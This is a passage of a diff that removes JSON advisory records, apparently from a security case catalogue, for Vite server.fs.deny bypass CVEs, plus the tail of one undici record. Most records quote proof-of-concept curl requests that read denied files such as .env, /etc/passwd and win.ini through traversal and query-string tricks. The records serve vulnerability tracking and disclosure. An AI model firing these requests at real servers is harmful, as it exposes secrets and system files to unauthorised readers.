deduplication.\n- Avoid concurrent identical requests to untrusted endpoints that may return very large/chunked bodies.\n- Apply upstream/proxy response-size and timeout limits.",
"published_at": "2026-03-13T20:37:58Z",
"updated_at": "2026-03-13T20:54:25.417862Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-phc3-fgpg-7m6h",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-2581",
"https://hackerone.com/reports/3513473",
"https://cna.openjsf.org/security-advisories.html",
"https://github.com/nodejs/undici"
],
"aliases": [
"CVE-2026-2581",
"GHSA-phc3-fgpg-7m6h"
],
"cve_ids": [
"CVE-2026-2581"
],
"ghsa_ids": [
"GHSA-phc3-fgpg-7m6h"
],
"osv_ids": [
"GHSA-phc3-fgpg-7m6h"
],
"affected_versions": [
"introduced=7.17.0, fixed<7.24.0"
],
"fixed_versions": [
"7.24.0"
],
"package_name": "undici",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/undici/cases/undici-cve-2026-2581.md",
"secure_code_topics": [
"ssrf-url-validation",
"proxy-trust-boundary"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "ssrf-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Undici"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}


@@ -1,83 +0,0 @@
{
"canonical_id": "vite--CVE-2024-23331",
"system_id": "vite",
"display_name": "Vite",
"category": "frameworks",
"advisory_mode": "core",
"title": "Vite dev server option `server.fs.deny` can be bypassed when hosted on case-insensitive filesystem",
"summary": "### Summary\n[Vite dev server option](https://vitejs.dev/config/server-options.html#server-fs-deny) `server.fs.deny` can be bypassed on case-insensitive file systems using case-augmented versions of filenames. Notably this affects servers hosted on Windows.\n\nThis bypass is similar to https://nvd.nist.gov/vuln/detail/CVE-2023-34092 -- with surface area reduced to hosts having case-insensitive filesystems.\n\n### Patches\nFixed in vite@5.0.12, vite@4.5.2, vite@3.2.8, vite@2.9.17\n\n### Details\nSince `picomatch` defaults to case-sensitive glob matching, but the file server doesn't discriminate; a blacklist bypass is possible. \n\nSee `picomatch` usage, where `nocase` is defaulted to `false`: https://github.com/vitejs/vite/blob/v5.1.0-beta.1/packages/vite/src/node/server/index.ts#L632\n\nBy requesting raw filesystem paths using augmented casing, the matcher derived from `config.server.fs.deny` fails to block access to sensitive files. \n\n### PoC\n**Setup**\n1. Created vanilla Vite project using `npm create vite@latest` on a Standard Azure hosted Windows 10 instance. \n - `npm run dev -- --host 0.0.0.0`\n - Publicly accessible for the time being here: http://20.12.242.81:5173/ \n2. Created dummy secret files, e.g. `custom.secret` and `production.pem`\n3. Populated `vite.config.js` with\n```javascript\nexport default { server: { fs: { deny: ['.env', '.env.*', '*.{crt,pem}', 'custom.secret'] } } }\n```\n\n**Reproduction**\n1. `curl -s http://20.12.242.81:5173/@fs//`\n - Descriptive error page reveals absolute filesystem path to project root\n2. `curl -s http://20.12.242.81:5173/@fs/C:/Users/darbonzo/Desktop/vite-project/vite.config.js`\n - Discoverable configuration file reveals locations of secrets\n3. 
`curl -s http://20.12.242.81:5173/@fs/C:/Users/darbonzo/Desktop/vite-project/custom.sEcReT`\n - Secrets are directly accessible using case-augmented version of filename\n\n**Proof**\n![Screenshot 2024-01-19 022736](https://user-images.githubusercontent.com/907968/298020728-3a8d3c06-fcfd-4009-9182-e842f66a6ea5.png)\n\n### Impact\n**Who**\n- Users with exposed dev servers on environments with case-insensitive filesystems\n\n**What**\n- Files protected by `server.fs.deny` are both discoverable, and accessible",
"published_at": "2024-01-19T21:58:47Z",
"updated_at": "2026-02-04T04:17:01.410592Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-c24v-8rfc-w8vw",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2023-34092",
"https://nvd.nist.gov/vuln/detail/CVE-2024-23331",
"https://github.com/vitejs/vite/commit/0cd769c279724cf27934b1270fbdd45d68217691",
"https://github.com/vitejs/vite/commit/91641c4da0a011d4c5352e88fc68389d4e1289a5",
"https://github.com/vitejs/vite/commit/a26c87d20f9af306b5ce3ff1648be7fa5146c278",
"https://github.com/vitejs/vite/commit/eeec23bbc9d476c54a3a6d36e78455867185a7cb",
"https://github.com/vitejs/vite",
"https://vitejs.dev/config/server-options.html#server-fs-deny"
],
"aliases": [
"CVE-2024-23331",
"GHSA-c24v-8rfc-w8vw"
],
"cve_ids": [
"CVE-2024-23331"
],
"ghsa_ids": [
"GHSA-c24v-8rfc-w8vw"
],
"osv_ids": [
"GHSA-c24v-8rfc-w8vw"
],
"affected_versions": [
"introduced=2.7.0, fixed<2.9.17",
"introduced=3.0.0, fixed<3.2.8",
"introduced=4.0.0, fixed<4.5.2",
"introduced=5.0.0, fixed<5.0.12"
],
"fixed_versions": [
"2.9.17",
"3.2.8",
"4.5.2",
"5.0.12"
],
"package_name": "vite",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/vite/cases/vite-cve-2024-23331.md",
"secure_code_topics": [
"dependency-upgrade-policy",
"file-upload-validation",
"proxy-trust-boundary"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "proxy-boundary-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Vite"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}


@@ -1,86 +0,0 @@
{
"canonical_id": "vite--CVE-2024-45811",
"system_id": "vite",
"display_name": "Vite",
"category": "frameworks",
"advisory_mode": "core",
"title": "Vite's `server.fs.deny` is bypassed when using `?import&raw`",
"summary": "### Summary\nThe contents of arbitrary files can be returned to the browser.\n\n### Details\n`@fs` denies access to files outside of Vite serving allow list. Adding `?import&raw` to the URL bypasses this limitation and returns the file content if it exists.\n\n### PoC\n```sh\n$ npm create vite@latest\n$ cd vite-project/\n$ npm install\n$ npm run dev\n\n$ echo \"top secret content\" > /tmp/secret.txt\n\n# expected behaviour\n$ curl \"http://localhost:5173/@fs/tmp/secret.txt\"\n\n <body>\n <h1>403 Restricted</h1>\n <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.\n\n# security bypassed\n$ curl \"http://localhost:5173/@fs/tmp/secret.txt?import&raw\"\nexport default \"top secret content\\n\"\n//# sourceMappingURL=data:application/json;base64,eyJ2...\n```\n\n",
"published_at": "2024-09-17T18:44:12Z",
"updated_at": "2026-02-04T04:05:31.919291Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-9cwx-2883-4wfx",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2024-45811",
"https://github.com/vitejs/vite/commit/4573a6fd6f1b097fb7296a3e135e0646b996b249",
"https://github.com/vitejs/vite/commit/6820bb3b9a54334f3268fc5ee1e967d2e1c0db34",
"https://github.com/vitejs/vite/commit/8339d7408668686bae56eaccbfdc7b87612904bd",
"https://github.com/vitejs/vite/commit/a6da45082b6e73ddfdcdcc06bb5414f976a388d6",
"https://github.com/vitejs/vite/commit/b901438f99e667f76662840826eec91c8ab3b3e7",
"https://github.com/vitejs/vite"
],
"aliases": [
"CVE-2024-45811",
"GHSA-9cwx-2883-4wfx"
],
"cve_ids": [
"CVE-2024-45811"
],
"ghsa_ids": [
"GHSA-9cwx-2883-4wfx"
],
"osv_ids": [
"GHSA-9cwx-2883-4wfx"
],
"affected_versions": [
"introduced=5.4.0, fixed<5.4.6",
"introduced=5.3.0, fixed<5.3.6",
"introduced=5.2.0, fixed<5.2.14",
"introduced=4.0.0, fixed<4.5.4",
"introduced=0, fixed<3.2.11",
"introduced=5.0.0, fixed<5.1.8"
],
"fixed_versions": [
"5.4.6",
"5.3.6",
"5.2.14",
"4.5.4",
"3.2.11",
"5.1.8"
],
"package_name": "vite",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/vite/cases/vite-cve-2024-45811.md",
"secure_code_topics": [
"dependency-upgrade-policy",
"file-upload-validation",
"proxy-trust-boundary"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "proxy-boundary-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Vite"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}


@@ -1,84 +0,0 @@
{
"canonical_id": "vite--CVE-2025-30208",
"system_id": "vite",
"display_name": "Vite",
"category": "frameworks",
"advisory_mode": "core",
"title": "Vite bypasses server.fs.deny when using ?raw??",
"summary": "### Summary\nThe contents of arbitrary files can be returned to the browser.\n\n### Impact\nOnly apps explicitly exposing the Vite dev server to the network (using `--host` or [`server.host` config option](https://vitejs.dev/config/server-options.html#server-host)) are affected.\n\n### Details\n`@fs` denies access to files outside of Vite serving allow list. Adding `?raw??` or `?import&raw??` to the URL bypasses this limitation and returns the file content if it exists. This bypass exists because trailing separators such as `?` are removed in several places, but are not accounted for in query string regexes.\n\n### PoC\n```bash\n$ npm create vite@latest\n$ cd vite-project/\n$ npm install\n$ npm run dev\n\n$ echo \"top secret content\" > /tmp/secret.txt\n\n# expected behaviour\n$ curl \"http://localhost:5173/@fs/tmp/secret.txt\"\n\n <body>\n <h1>403 Restricted</h1>\n <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.\n\n# security bypassed\n$ curl \"http://localhost:5173/@fs/tmp/secret.txt?import&raw??\"\nexport default \"top secret content\\n\"\n//# sourceMappingURL=data:application/json;base64,eyJ2...\n```",
"published_at": "2025-03-25T14:00:02Z",
"updated_at": "2026-02-04T03:13:24.371631Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-x574-m823-4x7w",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-30208",
"https://github.com/vitejs/vite/commit/315695e9d97cc6cfa7e6d9e0229fb50cdae3d9f4",
"https://github.com/vitejs/vite/commit/80381c38d6f068b12e6e928cd3c616bd1d64803c",
"https://github.com/vitejs/vite/commit/807d7f06d33ab49c48a2a3501da3eea1906c0d41",
"https://github.com/vitejs/vite/commit/92ca12dc79118bf66f2b32ff81ed09e0d0bd07ca",
"https://github.com/vitejs/vite/commit/f234b5744d8b74c95535a7b82cc88ed2144263c1",
"https://github.com/vitejs/vite"
],
"aliases": [
"CVE-2025-30208",
"GHSA-x574-m823-4x7w"
],
"cve_ids": [
"CVE-2025-30208"
],
"ghsa_ids": [
"GHSA-x574-m823-4x7w"
],
"osv_ids": [
"GHSA-x574-m823-4x7w"
],
"affected_versions": [
"introduced=6.2.0, fixed<6.2.3",
"introduced=6.1.0, fixed<6.1.2",
"introduced=6.0.0, fixed<6.0.12",
"introduced=5.0.0, fixed<5.4.15",
"introduced=0, fixed<4.5.10"
],
"fixed_versions": [
"6.2.3",
"6.1.2",
"6.0.12",
"5.4.15",
"4.5.10"
],
"package_name": "vite",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/vite/cases/vite-cve-2025-30208.md",
"secure_code_topics": [
"dependency-upgrade-policy",
"file-upload-validation",
"proxy-trust-boundary"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "proxy-boundary-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Vite"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}


@@ -1,81 +0,0 @@
{
"canonical_id": "vite--CVE-2025-31125",
"system_id": "vite",
"display_name": "Vite",
"category": "frameworks",
"advisory_mode": "core",
"title": "Vite has a `server.fs.deny` bypassed for `inline` and `raw` with `?import` query",
"summary": "### Summary\n\nThe contents of arbitrary files can be returned to the browser.\n\n### Impact\nOnly apps explicitly exposing the Vite dev server to the network (using `--host` or [`server.host` config option](https://vitejs.dev/config/server-options.html#server-host)) are affected.\n\n### Details\n\n- base64 encoded content of non-allowed files is exposed using `?inline&import` (originally reported as `?import&?inline=1.wasm?init`)\n- content of non-allowed files is exposed using `?raw?import`\n\n`/@fs/` isn't needed to reproduce the issue for files inside the project root.\n\n### PoC\n\nOriginal report (check details above for simplified cases):\n\nThe ?import&?inline=1.wasm?init ending allows attackers to read arbitrary files and returns the file content if it exists. Base64 decoding needs to be performed twice\n```\n$ npm create vite@latest\n$ cd vite-project/\n$ npm install\n$ npm run dev\n```\n\nExample full URL `http://localhost:5173/@fs/C:/windows/win.ini?import&?inline=1.wasm?init`",
"published_at": "2025-03-31T17:31:54Z",
"updated_at": "2026-02-04T04:37:24.129476Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-4r4m-qw57-chr8",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-31125",
"https://github.com/vitejs/vite/commit/59673137c45ac2bcfad1170d954347c1a17ab949",
"https://github.com/vitejs/vite",
"https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-31125"
],
"aliases": [
"CVE-2025-31125",
"GHSA-4r4m-qw57-chr8"
],
"cve_ids": [
"CVE-2025-31125"
],
"ghsa_ids": [
"GHSA-4r4m-qw57-chr8"
],
"osv_ids": [
"GHSA-4r4m-qw57-chr8"
],
"affected_versions": [
"introduced=6.2.0, fixed<6.2.4",
"introduced=6.1.0, fixed<6.1.3",
"introduced=6.0.0, fixed<6.0.13",
"introduced=5.0.0, fixed<5.4.16",
"introduced=0, fixed<4.5.11"
],
"fixed_versions": [
"6.2.4",
"6.1.3",
"6.0.13",
"5.4.16",
"4.5.11"
],
"package_name": "vite",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/vite/cases/vite-cve-2025-31125.md",
"secure_code_topics": [
"dependency-upgrade-policy",
"file-upload-validation",
"proxy-trust-boundary"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "proxy-boundary-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Vite"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}


@@ -1,82 +0,0 @@
{
"canonical_id": "vite--CVE-2025-31486",
"system_id": "vite",
"display_name": "Vite",
"category": "frameworks",
"advisory_mode": "core",
"title": "Vite allows server.fs.deny to be bypassed with .svg or relative paths",
"summary": "### Summary\n\nThe contents of arbitrary files can be returned to the browser.\n\n### Impact\n\nOnly apps explicitly exposing the Vite dev server to the network (using --host or [server.host config option](https://vitejs.dev/config/server-options.html#server-host)) are affected.\n\n### Details\n\n#### `.svg`\n\nRequests ending with `.svg` are loaded at this line.\nhttps://github.com/vitejs/vite/blob/037f801075ec35bb6e52145d659f71a23813c48f/packages/vite/src/node/plugins/asset.ts#L285-L290\nBy adding `?.svg` with `?.wasm?init` or with `sec-fetch-dest: script` header, the restriction was able to bypass.\n\nThis bypass is only possible if the file is smaller than [`build.assetsInlineLimit`](https://vite.dev/config/build-options.html#build-assetsinlinelimit) (default: 4kB) and when using Vite 6.0+.\n\n#### relative paths\n\nThe check was applied before the id normalization. This allowed requests to bypass with relative paths (e.g. `../../`).\n\n### PoC\n\n```bash\nnpm create vite@latest\ncd vite-project/\nnpm install\nnpm run dev\n```\n\nsend request to read `etc/passwd`\n\n```bash\ncurl 'http://127.0.0.1:5173/etc/passwd?.svg?.wasm?init'\n```\n\n```bash\ncurl 'http://127.0.0.1:5173/@fs/x/x/x/vite-project/?/../../../../../etc/passwd?import&?raw'\n```",
"published_at": "2025-04-04T14:20:05Z",
"updated_at": "2026-02-04T03:51:38.412061Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-xcj6-pq6g-qj4x",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-31486",
"https://github.com/vitejs/vite/commit/62d7e81ee189d65899bb65f3263ddbd85247b647",
"https://github.com/vitejs/vite",
"https://github.com/vitejs/vite/blob/037f801075ec35bb6e52145d659f71a23813c48f/packages/vite/src/node/plugins/asset.ts#L285-L290"
],
"aliases": [
"CVE-2025-31486",
"GHSA-xcj6-pq6g-qj4x"
],
"cve_ids": [
"CVE-2025-31486"
],
"ghsa_ids": [
"GHSA-xcj6-pq6g-qj4x"
],
"osv_ids": [
"GHSA-xcj6-pq6g-qj4x"
],
"affected_versions": [
"introduced=6.2.0, fixed<6.2.5",
"introduced=6.1.0, fixed<6.1.4",
"introduced=6.0.0, fixed<6.0.14",
"introduced=5.0.0, fixed<5.4.17",
"introduced=0, fixed<4.5.12"
],
"fixed_versions": [
"6.2.5",
"6.1.4",
"6.0.14",
"5.4.17",
"4.5.12"
],
"package_name": "vite",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/vite/cases/vite-cve-2025-31486.md",
"secure_code_topics": [
"dependency-upgrade-policy",
"file-upload-validation",
"proxy-trust-boundary",
"plugin-extension-trust-policy"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "proxy-boundary-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Vite"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}


@@ -1,80 +0,0 @@
{
"canonical_id": "vite--CVE-2025-32395",
"system_id": "vite",
"display_name": "Vite",
"category": "frameworks",
"advisory_mode": "core",
"title": "Vite has an `server.fs.deny` bypass with an invalid `request-target`",
"summary": "### Summary\nThe contents of arbitrary files can be returned to the browser if the dev server is running on Node or Bun.\n\n### Impact\nOnly apps with the following conditions are affected.\n\n- explicitly exposing the Vite dev server to the network (using --host or [server.host config option](https://vitejs.dev/config/server-options.html#server-host))\n- running the Vite dev server on runtimes that are not Deno (e.g. Node, Bun)\n\n### Details\n\n[HTTP 1.1 spec (RFC 9112) does not allow `#` in `request-target`](https://datatracker.ietf.org/doc/html/rfc9112#section-3.2). Although an attacker can send such a request. For those requests with an invalid `request-line` (it includes `request-target`), the spec [recommends to reject them with 400 or 301](https://datatracker.ietf.org/doc/html/rfc9112#section-3.2-4). The same can be said for HTTP 2 ([ref1](https://datatracker.ietf.org/doc/html/rfc9113#section-8.3.1-2.4.1), [ref2](https://datatracker.ietf.org/doc/html/rfc9113#section-8.3.1-3), [ref3](https://datatracker.ietf.org/doc/html/rfc9113#section-8.1.1-3)).\n\nOn Node and Bun, those requests are not rejected internally and is passed to the user land. For those requests, the value of [`http.IncomingMessage.url`](https://nodejs.org/docs/latest-v22.x/api/http.html#messageurl) contains `#`. Vite assumed `req.url` won't contain `#` when checking `server.fs.deny`, allowing those kinds of requests to bypass the check.\n\nOn Deno, those requests are not rejected internally and is passed to the user land as well. But for those requests, the value of `http.IncomingMessage.url` did not contain `#`. \n\n### PoC\n```\nnpm create vite@latest\ncd vite-project/\nnpm install\nnpm run dev\n```\nsend request to read `/etc/passwd`\n```\ncurl --request-target /@fs/Users/doggy/Desktop/vite-project/#/../../../../../etc/passwd http://127.0.0.1:5173\n```",
"published_at": "2025-04-11T14:06:03Z",
"updated_at": "2026-02-04T04:11:44.900383Z",
"severity": "medium",
"cvss_score": 4.0,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-356w-63v5-8wf4",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-32395",
"https://github.com/vitejs/vite/commit/175a83909f02d3b554452a7bd02b9f340cdfef70",
"https://github.com/vitejs/vite"
],
"aliases": [
"CVE-2025-32395",
"GHSA-356w-63v5-8wf4"
],
"cve_ids": [
"CVE-2025-32395"
],
"ghsa_ids": [
"GHSA-356w-63v5-8wf4"
],
"osv_ids": [
"GHSA-356w-63v5-8wf4"
],
"affected_versions": [
"introduced=6.2.0, fixed<6.2.6",
"introduced=6.1.0, fixed<6.1.5",
"introduced=6.0.0, fixed<6.0.15",
"introduced=5.0.0, fixed<5.4.18",
"introduced=0, fixed<4.5.13"
],
"fixed_versions": [
"6.2.6",
"6.1.5",
"6.0.15",
"5.4.18",
"4.5.13"
],
"package_name": "vite",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/vite/cases/vite-cve-2025-32395.md",
"secure_code_topics": [
"dependency-upgrade-policy",
"file-upload-validation",
"proxy-trust-boundary"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "proxy-boundary-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Vite"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}


@@ -1,80 +0,0 @@
{
"canonical_id": "vite--CVE-2025-46565",
"system_id": "vite",
"display_name": "Vite",
"category": "frameworks",
"advisory_mode": "core",
"title": "Vite's server.fs.deny bypassed with /. for files under project root",
"summary": "### Summary\nThe contents of files in [the project `root`](https://vite.dev/config/shared-options.html#root) that are denied by a file matching pattern can be returned to the browser.\n\n### Impact\n\nOnly apps explicitly exposing the Vite dev server to the network (using --host or [server.host config option](https://vitejs.dev/config/server-options.html#server-host)) are affected.\nOnly files that are under [project `root`](https://vite.dev/config/shared-options.html#root) and are denied by a file matching pattern can be bypassed.\n\n- Examples of file matching patterns: `.env`, `.env.*`, `*.{crt,pem}`, `**/.env`\n- Examples of other patterns: `**/.git/**`, `.git/**`, `.git/**/*`\n\n### Details\n[`server.fs.deny`](https://vite.dev/config/server-options.html#server-fs-deny) can contain patterns matching against files (by default it includes `.env`, `.env.*`, `*.{crt,pem}` as such patterns).\nThese patterns were able to bypass for files under `root` by using a combination of slash and dot (`/.`).\n\n### PoC\n```\nnpm create vite@latest\ncd vite-project/\ncat \"secret\" > .env\nnpm install\nnpm run dev\ncurl --request-target /.env/. http://localhost:5173\n```\n\n![image](https://github.com/user-attachments/assets/822f4416-aa42-461f-8c95-a88d155e674b)\n![image](https://github.com/user-attachments/assets/42902144-863a-4afb-ac5b-fc16effa37cc)",
"published_at": "2025-04-30T17:40:27Z",
"updated_at": "2026-02-04T03:27:17.681639Z",
"severity": "medium",
"cvss_score": 4.0,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-859w-5945-r5v3",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-46565",
"https://github.com/vitejs/vite/commit/c22c43de612eebb6c182dd67850c24e4fab8cacb",
"https://github.com/vitejs/vite"
],
"aliases": [
"CVE-2025-46565",
"GHSA-859w-5945-r5v3"
],
"cve_ids": [
"CVE-2025-46565"
],
"ghsa_ids": [
"GHSA-859w-5945-r5v3"
],
"osv_ids": [
"GHSA-859w-5945-r5v3"
],
"affected_versions": [
"introduced=6.3.0, fixed<6.3.4",
"introduced=6.2.0, fixed<6.2.7",
"introduced=6.0.0, fixed<6.1.6",
"introduced=5.0.0, fixed<5.4.19",
"introduced=0, fixed<4.5.14"
],
"fixed_versions": [
"6.3.4",
"6.2.7",
"6.1.6",
"5.4.19",
"4.5.14"
],
"package_name": "vite",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/vite/cases/vite-cve-2025-46565.md",
"secure_code_topics": [
"dependency-upgrade-policy",
"file-upload-validation",
"proxy-trust-boundary"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "file-upload-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Vite"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}


@@ -1,83 +0,0 @@
{
"canonical_id": "vite--CVE-2025-58752",
"system_id": "vite",
"display_name": "Vite",
"category": "frameworks",
"advisory_mode": "core",
"title": "Vite's `server.fs` settings were not applied to HTML files",
"summary": "### Summary\nAny HTML files on the machine were served regardless of the `server.fs` settings.\n\n### Impact\n\nOnly apps that match the following conditions are affected:\n\n- explicitly exposes the Vite dev server to the network (using --host or [server.host config option](https://vitejs.dev/config/server-options.html#server-host))\n- `appType: 'spa'` (default) or `appType: 'mpa'` is used\n\nThis vulnerability also affects the preview server. The preview server allowed HTML files not under the output directory to be served.\n\n### Details\nThe [serveStaticMiddleware](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L123) function is in charge of serving static files from the server. It returns the [viteServeStaticMiddleware](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L136) function which runs the needed tests and serves the page. The viteServeStaticMiddleware function [checks if the extension of the requested file is \".html\"](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L144). If so, it doesn't serve the page. Instead, the server will go on to the next middlewares, in this case [htmlFallbackMiddleware](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/htmlFallback.ts#L14), and then to [indexHtmlMiddleware](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/indexHtml.ts#L438). These middlewares don't perform any test against allow or deny rules, and they don't make sure that the accessed file is in the root directory of the server. 
They just find the file and send back its contents to the client.\n\n### PoC\nExecute the following shell commands:\n\n```\nnpm create vite@latest\ncd vite-project/\necho \"secret\" > /tmp/secret.html\nnpm install\nnpm run dev\n```\n\nThen, in a different shell, run the following command:\n\n`curl -v --path-as-is 'http://localhost:5173/../../../../../../../../../../../tmp/secret.html'`\n\nThe contents of /tmp/secret.html will be returned.\n\nThis will also work for HTML files that are in the root directory of the project, but are in the deny list (or not in the allow list). Test that by stopping the running server (CTRL+C), and running the following commands in the server's shell:\n\n```\necho 'import path from \"node:path\"; import { defineConfig } from \"vite\"; export default defineConfig({server: {fs: {deny: [path.resolve(__dirname, \"secret_files/*\")]}}})' > [vite.config.js](http://vite.config.js)\nmkdir secret_files\necho \"secret txt\" > secret_files/secret.txt\necho \"secret html\" > secret_files/secret.html\nnpm run dev\n\n```\n\nThen, in a different shell, run the following command:\n\n`curl -v --path-as-is 'http://localhost:5173/secret_files/secret.txt'`\n\nYou will receive a 403 HTTP Response,\u00a0 because everything in the secret_files directory is denied.\n\nNow in the same shell run the following command:\n\n`curl -v --path-as-is 'http://localhost:5173/secret_files/secret.html'`\n\nYou will receive the contents of secret_files/secret.html.",
"published_at": "2025-09-09T20:54:42Z",
"updated_at": "2026-02-04T04:35:16.287471Z",
"severity": "medium",
"cvss_score": 4.0,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-jqfw-vq24-v9c3",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-58752",
"https://github.com/vitejs/vite/commit/0ab19ea9fcb66f544328f442cf6e70f7c0528d5f",
"https://github.com/vitejs/vite/commit/14015d794f69accba68798bd0e15135bc51c9c1e",
"https://github.com/vitejs/vite/commit/482000f57f56fe6ff2e905305100cfe03043ddea",
"https://github.com/vitejs/vite/commit/6f01ff4fe072bcfcd4e2a84811772b818cd51fe6",
"https://github.com/vitejs/vite",
"https://github.com/vitejs/vite/blob/v7.1.5/packages/vite/CHANGELOG.md"
],
"aliases": [
"CVE-2025-58752",
"GHSA-jqfw-vq24-v9c3"
],
"cve_ids": [
"CVE-2025-58752"
],
"ghsa_ids": [
"GHSA-jqfw-vq24-v9c3"
],
"osv_ids": [
"GHSA-jqfw-vq24-v9c3"
],
"affected_versions": [
"introduced=7.1.0, fixed<7.1.5",
"introduced=7.0.0, fixed<7.0.7",
"introduced=6.0.0, fixed<6.3.6",
"introduced=0, fixed<5.4.20"
],
"fixed_versions": [
"7.1.5",
"7.0.7",
"6.3.6",
"5.4.20"
],
"package_name": "vite",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/vite/cases/vite-cve-2025-58752.md",
"secure_code_topics": [
"dependency-upgrade-policy",
"file-upload-validation",
"proxy-trust-boundary",
"plugin-extension-trust-policy"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
